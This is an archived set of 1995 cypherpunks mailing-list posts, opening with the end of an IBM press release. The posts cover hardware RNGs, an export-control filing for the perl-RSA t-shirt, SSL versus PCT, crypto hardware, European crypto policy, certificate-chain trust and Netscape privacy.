> Secured Network Gateway on PowerPC hardware.
> 
> Another key feature of the new version is data encryption.  Data
> can safely flow between two firewalls across a public network.
> The firewall encrypts IP data packets, creating a private "IP
> tunnel" from one secure internal network to another.
> 
> The new secure IP tunnels could be used for a company with the
> Secured Network Gateway installed at its various sites to safely
> and confidently transmit sensitive financial data from a branch
> office over the Internet to corporate headquarters.  Customers
> could also use the new feature to securely administer a firewall
> from a remote location.
> 
> Internet Connection directions
> 
> Just as the Internet itself continues to expand phenomenally, the
> Internet Connection family, now consisting of seven generally
> available products, will also grow.  Current product plans call
> for additional web clients on a number of platforms, and web
> server software for OS/400, MVS and selected non-IBM systems.
> 
> "We don't intend to just keep pace with the market; we intend to
> be the pacesetter," said IBM's Dimpfel.  "IBM has worldwide reach
> and strengths like no other company.  The IBM Global Network,
> robust software products, IBM services and gateway software to
> link with existing business systems using DB2 and CICS--all this
> means customers don't have to deal with patching together
> solutions from a collection of vendors."
> 
> The Internet Connection product family is a component of IBM's
> imperative to provide people and organizations with
> network-centric computing, a new model that combines networking
> software, network services and computing devices to facilitate
> computing anywhere, anytime.
> 
> IBM, the world's largest software provider, creates, develops and
> manufactures the industry's most advanced information technologies,
> including networking systems, software, computing systems, storage
> devices and microelectronics.
> 
> Pricing and availability
> 
> The secure server software for OS/2 Warp is $2,999 for the first
> license with additional licenses available for $2,699 each.  The
> AIX secure server software is $4,999 for the first license and
> $4,499 for an additional license.  The Internet Connection Secured
> Network Gateway is priced at $9,999 for the first license, with
> additional licenses available for $8,999.
> 
> The new secure WebExplorer for OS/2 Warp is $35 per copy and
> pricing on the enhanced IBM Internet Connection for Windows has
> been reduced to $59.
> 
> Both secure servers and the secure Web Explorer for OS/2 Warp
> will be generally available in December of this year.  The new
> version of the Secured Network Gateway will be available in
> October.
> 
> 
> IBM, OS/2, AIX, CICS, DB2 and RISC System/6000 are trademarks of IBM.
> 
> Windows is a trademark of Microsoft Corp.
> 


-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 1 Oct 95 11:21:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac92ed4110021004ff54@[205.199.118.202]>
Message-ID: <199510011820.OAA27233@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> I'm not making an appeal to authority here, just telling you why I'm
> skeptical of all of these proposals to make a radioactive decay-based
> random number source. There are much easier ways.)

I don't believe the "easier" ways are actually really easier, in so
far as it is very hard to successfully demonstrate that there are no
hidden flaws in most kinds of hardware RNGs -- showing you aren't
picking up nearby RFI and turning it into your RNG output and things
of that sort. A radioactive source is hard to manipulate at a
distance. It will not produce a big volume of random numbers but it
will produce pretty high quality ones. If you have a free running
/dev/rand implementation that saves a lot of them up you should have
enough for most of our purposes.

And, as I noted, there are RS232 interfaceable radiation detectors you
can buy off the shelf -- no hardware hacking needed.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Sun, 1 Oct 95 13:22:43 PDT
To: "Cancelmoose[tm]" <moose@cm.org>
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <19950930064113.AXK11529@cm.org>
Message-ID: <199510012022.OAA07852@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

"Cancelmoose[tm]" <moose@cm.org> wrote:
>
> I apologize for the delay in responding to your message -- I will be
> putting a lot of information about NoCeM up on http://www.cm.org in
> the next day or so.  You can also find information in the newsgroup
> alt.nocem.misc (if you get it).
> 
> If these don't work for you, feel free to write to me, and I'd be
> happy to send you whatever you need.


I've had a look at the web site and it looks really interesting.  It would
make a great project if a bunch of cypherpunks installed NoCeM and then piped
the list to a newsgroup.  We could then develop reputation servers to help us
use NoCeM, start charging cyberbucks for our recommendations, and, in short,
make cpunks into a slightly larger outpost in Cyberlibertaria.  (a.k.a. The
Free Net)


Bryce

signatures follow



To strive, to seek, to find and not to yield.

bryce@colorado.edu   http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0

iQCVAwUBMG72U/WZSllhfG25AQEbAAP+Kh8aNRsqfk9TmEtwhbIkhaKGeHh0CyNC
lSQ+vak2IknE2QTxVP01hRGEXfQBZ9JOlxvEQK/ka3SqISmNl1WXo7mGBtk65t+R
42WehIoSuMGJ9maagCK+EPZM+o0PEyqGBA9n4m4GWb1ufM5FiBJISQDIkOQtHy+y
+U07bKuw6lI=
=vxTn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Sun, 1 Oct 95 15:32:25 PDT
To: cypherpunks@toad.com
Subject: CJR for perl-RSA t-shirt
Message-ID: <199510012231.PAA00669@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Here is a draft of the CJR I intend to file, for the perl-RSA t-shirt.
Please check it over for technical inaccuracies or other problems. It
should sound quite familiar, as I have shamelessly ripped off the CJR
that Phil Karn filed for the Applied Cryptography book.

Let me know what you think!

Raph

=======================================================================
ATTN: Maj Gary Oncale - 15 Day CJ Request
U.S. Department of State
Office of Defense Trade Controls
PM/DTC SA-6 Room 200
1701 N. Fort Myer Drive
Arlington, VA  22209-3113
Fax +1 703 875 5845

ATTN: 15 Day CJ Request Coordinator
National Security Agency
P.O. Box 246
Annapolis Junction, MD  20701


Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
          Requested

Subject:  Commodity Jurisdiction Request for
          perl-RSA t-shirt, an encryption program

INTRODUCTION

This is a Commodity Jurisdiction Request for mass market software
with encryption capabilities.  
 
The name of the software product is "perl-RSA t-shirt", by
Adam Back. It is published in the form of a t-shirt by Joel Furr, 916
W. Trinity Ave, #10, Durham NC 27701.

I have no DTC registration code.

I have reviewed and determined that this t-shirt, the subject of this CJ
request, meets paragraph 1 of the "Criteria for Determining the
Eligibility of A Mass Market Software Product for Expedited Handling."

I base this determination on the following facts:

a) this t-shirt is readily available from Joel Furr, and has been
shipped in quantity of several hundred copies, thus qualifying it as
mass market software;

b) sufficient documentation is included to allow installation and use
by any end user capable of typing in the software, or scanning the bar
code, and running it. Additional documentation is available on the
Internet World Wide Web at http://dcs.ex.ac.uk/~aba/rsa/ . To my
knowledge the author and publisher provide no "product support" as
that term is generally understood; and

c) the t-shirt contains encryption software source code listings that
provide confidentiality.

A duplicate copy of this CJR has been sent to the 15 Day CJ Request
Coordinator.

DESCRIPTION

The t-shirt contains an implementation of the RSA asymmetric
cryptographic algorithms. Furthermore, instructions, in the form of a
terse usage string, are given for using the implementation to provide
confidentiality. The source code of the implementation is featured
both as four lines of text and also as a bar code, making the t-shirt
machine readable as well as machine washable. The algorithm is
implemented in the Perl scripting language, and will run on any
standard Unix configuration that includes both an implementation of
the Perl language and the common "dc" (desk calculator) program.

Two copies of the shirt are included with the filing of this CJ
request.

ORIGIN OF COMMODITY

This t-shirt originates in the United States. While the primary author
is a citizen of the United Kingdom, living in England, other
contributors to the work are citizens of the US living in the US. The
publisher is a United States citizen living in the United States. The
t-shirts are manufactured and printed in the United States.

The cryptographic algorithm implemented in this t-shirt comes from
various sources, at various times, and was produced with both private
and public sources of funding.

The source code implementation contained in the t-shirt also comes
from a variety of countries, including Australia, Canada, the United
States and the United Kingdom.

The algorithm is thought to be designed for private and commercial
civilian use.

The t-shirt is currently publicly available from Joel Furr, at a list
price of $12.36, including shipping and handling. More ordering
information is available on the Internet World Wide Web at
http://www.danger.com/ad-perl.html .

CURRENT USE

The t-shirt is intended as an implementation of the RSA cipher for
those who wish to incorporate encryption into their communications.
The small size of the implementation makes it particularly useful in
contexts in which existing cryptographic infrastructure is not
available.

Examples of the commercial use of the cipher implemented include
integrity verification, authentication and confidentiality of
electronic mail, computer software, voice, video and other information
in digitized form. For example, the cipher is used either by itself
for email privacy, and also as a component in other protocols that
provide privacy and authentication, including PGP (Pretty Good
Privacy), S/MIME (Secure Multipurpose Internet Mail Extensions), MOSS
(MIME Object Security Services), PEM (Privacy Enhanced Mail), and SSL
(Secure Sockets Layer).

The uses of this cipher have not changed significantly over time,
although their popularity has grown substantially. Their present
military utility is unknown, except that it is believed that the
algorithm is not approved for the protection of US classified
information.

SPECIAL CHARACTERISTICS

There are no military standards or specifications that this t-shirt is
designed to meet. There are no special characteristics of the t-shirt,
including no radiation-hardening, no ballistic protection, no hard
points (the t-shirt is only available in soft 100% cotton), no TEMPEST
capability, no thermal and no infrared signature reduction capability
(in excess of that provided by a typical black cotton t-shirt), no
surveillance, and no intelligence gathering capability. The t-shirt
does not use image intensification tubes.

OTHER INFORMATION

I recommend that this t-shirt be determined to be in the jurisdiction
of the Commerce Department. I believe that it qualifies for the
general license GTDA for General Technical Data to All Destinations,
because it qualifies as "publicly available".

ATTACHMENTS

I have enclosed two copies of the t-shirt, included with the primary
filing of this CJ request.


                                        Sincerely,



                                        Raphael L. Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 1 Oct 95 14:02:34 PDT
To: cypherpunks@toad.com
Subject: N$ SSL vs M$ PCT
Message-ID: <v02120d03ac94b0e71032@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Sun, 01 Oct 1995 20:36:31 PM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: N$ SSL vs M$ PCT

Having found that Micro$oft have produced a standards document
about their alternative to SSL I was interested in comparing it to
that written by Net$cape.

The big question in my view is why did they produce a new
proposal is it:

a) Because they have found major flaws in the SSL protocol
and wish to correct these (note the protocol not the implementation)

or is it

b) Because M$ want to "own" the Internet Security Software market
and take the initiative off N$ who, notwithstanding their problems with
implementation, have produced a working system.

My personal view is that b) is the case.

Comparison

I have compared
SSL V3 <draft-hickman-netscape-sl-01.txt>  (available at www.netscape.com)
PCT http://www.microsoft.com/windows/ie/pct.htm <draft-microsoft-PCT-91.txt>
Both have status of Internet Draft.
I have implemented SSL V2 in a browser
(ftp://193.119.26.70/mktnet/pub/horse.zip)
and a server (https://alpha.mkn.co.uk/)
I have not implemented and do not intend implementing PCT

Both SSL V3 and PCT now involve a vast number of different alternatives
for Ciphers most of these alternatives do not help in any practical sense
and I have not compared the lists.

PCT allows for supporting SSL as well by using a bit in the SSL version number
to indicate PCT.  This means that servers can support both protocols. Clients
cannot as the first message is sent by the client and there is no provision for
SSL/PCT negotiation.

Both PCT and SSL start with an initial session (GET or POST in wwwland) which
establishes a master key and allow continuations of that key in later sessions.

M$ use the following arguments in support of PCT:
1. it is simpler.
PCT uses longer messages with more fields in them.  It cuts out the final
SERVER-FINISHED and CLIENT-FINISHED messages.  It puts some of the
data in SSL into other records.  I quite like the verification in the
CLIENT-FINISHED
message which means that bad implementatations crash out at that point rather
than putting rubbish into the higher level protocol.  However, I consider that
in essence there is no real difference.  I, therefore, disagree with M$.

2. Message authentication uses different keys to the encryption keys.  How
this helps, apart from making implementation harder, I cannot quite fathom.  We
should not be using this secure channel protocol for proper message
authentication
only.  The MAC (Message Authentication Code) is not what I would use for
authentication from a legal and contractual background.  I prefer Digitally
Signed
Instructions.

3. They say there is a security hole in SSL's client authentication.
When the initial session establishing a session key uses (for example) 40 bit
encryption. It does mean that subsequent sessions are also essentially just as
insecure.  This is the case for PCT and SSL.  However, client authentication
in SSL uses a digital signature using the client's private key.  To get hold of
this requires something more than simply being man in the middle.  I think M$
are well out of order on this one.

4. They introduce a verify prelude field to make sure that the cipher type
and other negotiations have not been tampered with.  I suppose this is a
fair if disingenuous point.  If a "man in the middle" is tampering with your
negotiations to make sure that you use a low level of encryption so that it
can be cracked then your implementations should not be using such
crippleware and cypherpunks will have cracked it ages ago.

There is a point that should be made that servers and clients should really
indicate the encryption cipher being used.  Both my client and server do.

So in essence M$ make 4 arguments. Two are IMHO wrong.  One is
irrelevant from a commercial perspective and the other one does not matter.

In the end N$'s version is working.  M$ are probably coding like mad.

The final formula to determine the result may be

if (M$>N$) SSL+=PCT;

where M$ and N$ are measured in US Dollars.

(MarketNt is a UK company independent of both M$ and N$ although
N$ were helpful in debugging the interoperability of my early essays into
SSL for which I am grateful.)

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 1 Oct 95 18:54:35 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Crypto hardware summary
Message-ID: <v02120d01ac94f4da72ff@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[A summary of my points on crypto hardware follows my response
to Norm.]

Norm Hardy writes:
>What key length are you using that takes 3.2 sec?
>The DSP can operate concurrently with other processing, giving an
>improvement greater than 3.2/1.9.

I'm aware of this -- I was using Tim's pessimistic estimate
of improvement... to make it clearer for those who didn't read
his post, I should have said, "Even if the reduction is only from
3.2 seconds to 1.9 seconds, it would be significant for someone
running a server." I'm aware that with  DSPs you can get rather
better results; an ASIC will get you another order of magnitude
over DSPs (assuming equivalent price -- the Moto 96K DSP is a real
gem for bignum math but is many times more expensive than an
equally effective ASIC. They were also having serious availability
problems last year...)

Here is a summary of my points on this subject to date, for those
who haven't been following this discussion:

  o Using coprocessors of any sort to achieve speed in cryptography
    operations is probably not justified for end users; it is almost
    always justified for servers with a high volume of transactions
    requiring public key authentication or encryption.

  o DSPs are not really as attractive as general purpose CPUs for
    accelerating cryptography for high-volume servers. Although DSP
    architecture is somewhat more conducive to bignum math, the benefits
    seem to be offset by the wide availability of standard CPUs and
    tools for programming them. If a large increase in speed is desired
    without resorting to single-purpose hardware, I recommend using
    a large number of standard CPUs as coprocessors, rather than an
    equivalent approach with DSPs. (The fact that uint multiplies
    on a 486 take multiple clock cycles is offset by the higher
    internal clock speeds and lower cost of the 486. You can point out
    super-fast DPSs, and I can point out their super-large price tags,
    more expensive tools, and substantially more expensive programmers.)

  o The real way to go for speed is ASICs, which give you much better
    bang for the buck, although they have disadvantages, including
    problems of export, inflexibility, etc. My favorite RSA chip board
    so far is from Uti-Maco in Belgium, which is a tamper-resistant
    add-in card with a 8086-compatible controller and a custom BIOS
    for doing RSA and DES operations in h/w, which allows s/w to be
    developed using standard tools. (I have ranted at length about the
    complications involved with _Beligan_ crypto export controls,
    which seem to stem from NATO pressure and US desire to balkanize
    the market for cryptography products.)

  o People doing valuable transactions on servers are going to want
    tamper resistance and hardware-key security. This is more important
    in some cases than speed, although speed is also very important.

  o People running cryptography-based transaction clients on their PCs are
    going to learn, one way or another, that having valuable secret keys
    on their hard disks is not a great idea. This, not speed, is the
    primary motivation for consumer-oriented cryptography hardware.
    People want their keys and financial transactions on secure, removable,
    non-mechanical media. Products that provide this are just starting
    to come on the market, notably from National Semiconductor and
    Telequip.

  o End-user software will need to be written to allow, but not require,
    external cryptography devices. Consequently, consumer software that
    performs valuable transactions still needs to be written in an
    extremely paranoid fashion with respect to the reliability and
    security of the underlying hardware.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 1 Oct 95 10:51:13 PDT
To: cypherpunks@toad.com
Subject: Re: Europe
Message-ID: <Pine.HPP.3.91.951001183508.11746A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Perry M. wrote:

> I was wondering if the Europeans had an equivalent of EPIC or EFF
> lobbying against crypto restrictions there, given the disturbing news
> a week or so ago.

Europe, in this regard, is still mostly every country on it's own.
Lobbying in Brussels is not for mortals, and decisions are in
closed chambers anyway (the Commission; inter-governmental level).

Sweden: The authorities have not yet said anything at all about
where they stand in the GAK controversy. Probably very few have
heard about it. A national IT-Commission was formed by the former
government a year and a half ago, then they lost the elections
a year ago and the new IT-Commission (yes, very partisan) has
just settled down. The only thing that has come up on a public
(television) level is demands from the police of access to
decoded GSM traffic, which I believe is under implementation
now (the obstacle has mainly been who is going to pay for the
software updates of the GSM nodes). Sweden has rather strict
rules for wiretapping (at least officially) and their is no
public pressure for any change in this. On the local networks
(the swnet.* newsgroups and Fidonet meetings) there is some
discussion of crypto vs computer networking but only in
obscure niches. If/when GAK will be proposed this might hopefylly
change.

I think the basic difference USA vs Sweden in this regard is a
time delay of some years. We have lots of Internet nodes per
capita (more than in the US, they say) but the net is still
largly run by engineers (if only that could last!) and net
awareness is rare above the age of 30 (i.e. among those who
have a say).

The European Council document (posted here in full by Dave
Banisar) is certainly worrying. Of course, I've tried to
spread it on the Swedish speaking networks 



For information on Swedish net cencorship there is a 'mini-CAF' at:

http://www.dtek.chalmers.se/~d1dd/censorship/

PS
Perry, what was your impression of the Swedes you met at the
IETF meeting in Stockholm last July? I guess they were so
happy about the new 34 Mbit/s connection to the New World
that they forgot about the rest?

Mats
*********************************************************
For a searchable list of products in the Swedish national
monopoly liquor-shops, see:

http://lupus.physchem.kth.se/systemet.html










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 15:49:06 PDT
To: cypherpunks@toad.com
Subject: I am the anti-Ch<fnord>
Message-ID: <9510012248.AA07906@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I got some email responses to my SAIC info.  Here's a little more fun on
a Sunday evening.  All the statements below are true.

Among the first two (possibly the very first two) MX records for not-connected
sites desiring Internet-style names were:  att.com and mirror.tmc.com.
That is, the phone company, and a small subsidiary of the Times-Mirror
corporation.  It was from mirror that mod.sources/comp.sources.unix was
moderated -- for many years, the only source of free software available
to Usenet.

Seismo was the forwarder for both ATT and TMC (via special-case lines in
Rick's sendmail.cf file).  ATT, through ihnp4 in Chicago (site of the
Democratic convention), vied with seismo for the we'll-call-anyone philosophy
that a few sugar daddies (er, backbone) sites had that kept uucp Email
and Usenet running back then.  Under the auspices of the curiously-named
"Network Action Central" many ATT sites did dialup UUCP to mirror on a
daily basis, ostensibly to pick up mod.sources.

I was the administrator of mirror.tmc.com; the tmc.com domain "conflicted"
with tmc.edu, the Texas Medical Center.  The NIC back then asked me to
ask tmc.edu to "reconsider."  Do you know where their book depository
is/was?

Rick started Alternet, now "Shared" with Microsoft.  Unlike Sprint and
MCI, ATT "curiously" decided to *not* become a network service provider,
but instead allied with BBN and sells their technology, equipment and
services.  I worked at BBN for five years, in the same department that
became BBNPlanet, the global ISP and ATT's partner.  I also wrote INN,
which now handles essentially all the Usenet traffic in the world.

So who cares about the latest media mega-deal of Eisner or Time-Warner-Turner?
We already control the Internet media; the Web is merely~~~~#@

NO CARRIER




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 17:33:58 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos
Message-ID: <9510020033.AA08263@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From: "David J. Bianco" <bianco@itribe.net>
Date: Sun, 24 Sep 1995 16:32:30 -0400

>The Open Software Foundation's Distributed Computing Environment has the
>concept of a central security registry (which is currently based on
>Kerberos).  I haven't delved too deeply into them, but the OSF website has
>some DCE RFCs about adding public key capabilities to the registry.  They
>should be off the OSF home page somewhere at <http://www.osf.org>.

Sort of.  The DCE registry isn't really based on Kerberos.  Rather, DCE
uses Kerberos code to do its private-key stuff.  We're planning on adding
the ability to use public key to get initial tickets to the security server.
Outside of integration with other security domains, this means that the
security server no longer needs to store everyone's private key, reducing
exposure if it's been cracked.

If anyone wants more details on how current or planned DCE security,
drop me a line.  Perhaps some of the other folks on this list who also know
about it will speak up, too.
	/r$, DCE whipping boy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 1 Oct 95 13:33:37 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9510010446.AA11983@dmsd.com>
Message-ID: <44mtu4$59h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9510010446.AA11983@dmsd.com>, jbass@dmsd.com (John L. Bass) writes:
> Another is since the clients are often distributed
> over the net, that another filter is installed recognize clients and alter
> them on the fly to avoid the client/filter problem in the future.

  This is kind of silly.  If someone can patch the binary on the fly as
you are downloading it, then all is lost, since they could just patch
it to send them copies of any information they wanted.

> Another tack is based on getting very close to the server (in a bridge or
> router in the direct path to the server) in which the filter might acutally
> be able to get the get valid certificates signed in the servers name, while
> eating the real requests.

  I really don't understand what you are saying here.  Do you mean that
you could intercept a real server's certificate request, and substitute
your own private key, and then intercept the response?  This could be
easily detected by the CA and the server operator, and I think is just
a policy issue for the CA.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Sun, 1 Oct 95 13:44:28 PDT
To: cypherpunks@toad.com
Subject: Re: NetScape's dependence upon RSA down for the count!
In-Reply-To: <199510010812.BAA11516@ix4.ix.netcom.com>
Message-ID: <44muie$59h@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510010812.BAA11516@ix4.ix.netcom.com>, stewarts@ix.netcom.com (Bill Stewart) writes:
> Or hack the Web of Trust used to verify the server's identity.
> It _is_ still a Web of Trust even if it's a fascistly-hierarchical tree;
> as long as it's possible to get a certificate without heavy contractual
> obligations, you can hack it, since the software has no way to check,
> now that Netscape is being nice and open and allowing non-Verisign certs.
> Remember that anybody can be a CA, and keys can be signed by multiple CAs.
> 
>         Verisign Business CA signs Carol's Certification Consultants' key.
>         Carol signs Bob's Better Browser Business's key.  
>         Bob runs a server, selling really cool web tools.
>         Verisign Business CA signs Moriarty's Mallet Makers' key.
>         Moriarty signs Mr. X's personna key (trust us.)
>         Mr. X makes a key called Bob's Better Browser Business,
>         looking suspiciously like the real thing, only it's
>         signed by Mr. X, and nobody bothered telling Bob about it.
> 
>         Alice, using Netscape, encounter's http://www.Bob'sBetterBrowser.com/,
>         and decides to order a Better Browser.  She gets Bob's public key
>         and X.509 certificates by pressing a button, and receives a key
>         and a pile of certs.  Since it's not a secure session yet, is Mr. X
>         intercepting them and sending her _his_ key and cert for "Bob" and his
>         personna key with cert from Moriarty and his key and cert from Verisign?
>         
>         So Mr. X rips off Alice and/or Bob somewhere here, and Alice decides to sue
>         Bob, who says "Hey, that's not my key, see my real set of certs",
>         so they go off after Mr. X, who they can't find, and then go after
>         Moriarty, who says "Hey, it's just a personna certificate; all I
>         guaranteed was that I didn't sign more than one with the same name on it",
>         which in fact appears to be true, and while after one case you can't 
>         be sure that there really wasn't a Mr. X somewhere, if three or four
>         people start walking in saying Mr. X ripped them off using a key
>         that Moriarty signed, maybe somebody'll think it's a movement...

  You are making a lot of assumptions here.  Lets say that the browser
software is allowing certificate chaining (browser traverses certificate
issuers until it finds one it trusts, then accepts the entire chain).
There could be an attribute in the certificate that indicates whether
the issuer is certifying it to be a subordinate CA.  Presumably when
Moriarty signs a persona certificate, it does not have this attribute.

> Now, X.509 certs don't limit themselves to hierarchical or Web use, and most
> advice on using them recommends limiting the depth of a tree/web that you're
> willing to trust.  Unfortunately, X.509 certs don't even have a comment field,
> much less a standardized "how much do you trust this person you're signing"
> field,
> though I suppose you can cram a bit into the X.400/500-style name formats.

  X509 version 3 does support arbitrary extensions.  We are making use of
this feature in Netscape Navigator 2.0.  Giving certificates attributes
such as "how was their identity verified" and "what operations are they
certified for" is an obvious application of this.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: banisar@epic.org (Dave Banisar)
Date: Sun, 1 Oct 95 17:55:22 PDT
To: Mats Bergstrom <cypherpunks@toad.com
Subject: Re: Europe
Message-ID: <v02130501ac94e5d19a74@[205.177.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/1/95, Mats Bergstrom wrote:
>Perry M. wrote:
>
>> I was wondering if the Europeans had an equivalent of EPIC or EFF
>> lobbying against crypto restrictions there, given the disturbing news
>> a week or so ago.
>

There are a few groups in Europe (Privacy International is based in UK,
Argedaten in Austria, CLI in Spain, misc EF-X) but none of them are as
organized as their US counterparts. However, there are also Privacy
Commissions in every country who are also friends to the battle. There was
quite a bit of discussion at their last meeting in Copenhagen last month on
crypto and the Denmark and Ontario, CA Privacy Commissions just came out
with a joint report on crpyto that we are working on scanning in and making
available on our web page.

Dave


David Banisar (Banisar@epic.org)             * 202-544-9240 (tel)
Electronic Privacy Information Center      * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301       * HTTP://www.epic.org
Washington, DC 20003                              * ftp/gopher/wais cpsr.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 1 Oct 95 17:59:05 PDT
To: anonymous@freezone.remailer
Subject: Re: SAIC in VA
In-Reply-To: <199509301133.HAA22001@light.lightlink.com>
Message-ID: <Pine.SV4.3.91.951001205636.22845J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


You left out their subsidiary in Springfield VA. 
Plain Vanilla broadcast engineering  consulting  - mostly....

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 1 Oct 95 17:59:24 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: CJR for perl-RSA t-shirt
Message-ID: <v02120d03ac94e789fd7a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Subject:  Mass Market Software with Encryption - 15 Day Expedited Review
>          Requested
>
>Subject:  Commodity Jurisdiction Request for
>          perl-RSA t-shirt, an encryption program

ROTFL!

I haven't had this much fun since the hogs ate my little brother.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 1 Oct 95 21:42:30 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <199510020442.VAA14808@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:39 AM 9/30/95 -0400, Dr. Frederick B. Cohen wrote:
>The problem is that if these keys are weak, there may be many others
>that are also weak.  In fact, by the time we explore all of the
>weaknesses, we may find the system is no longer very strong at all. 

These so called weak keys are far from weak.

You have a 1 in 64000 chance of reducing the search space by 64000.  
Big deal.

Use 128 bit session keys.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 1 Oct 95 18:46:29 PDT
To: Jon Mittelhauser <jonm@netscape.com>
Subject: Re: Netscape and privacy
In-Reply-To: <44fin4$rdq@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.951001214318.15739I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


With all respect to you and to Netscape (I am one who thinks that the
Netscape participation on this list has reflected very well on the
participants and the company), I think that the reply "we only collect IP
addresses" is not fully responsive to the issue.  While I recognize that
there are implementations that assign a new IP address to every login, I
understand the current norm to be static IP addresses.  I sure have one. 
Thus, if you keep a file of my IP address, and a fact about that address,
you have a database that can be purchased and correllated with another DB,
which links IP to somehting else, eg telephone numbers (perhaps from a
contest run on the internet?).  Pretty soon we are at serious
profiling.... 

****   PLEASE NOTE NEW E-MAIL ADDRESS: froomkin@law.miami.edu  *********

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 1 Oct 95 18:58:19 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
In-Reply-To: <v02120d16ac90fe1bdb12@[199.2.22.120]>
Message-ID: <Pine.SUN.3.91.951001215502.15739M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 28 Sep 1995, Douglas Barnes wrote:
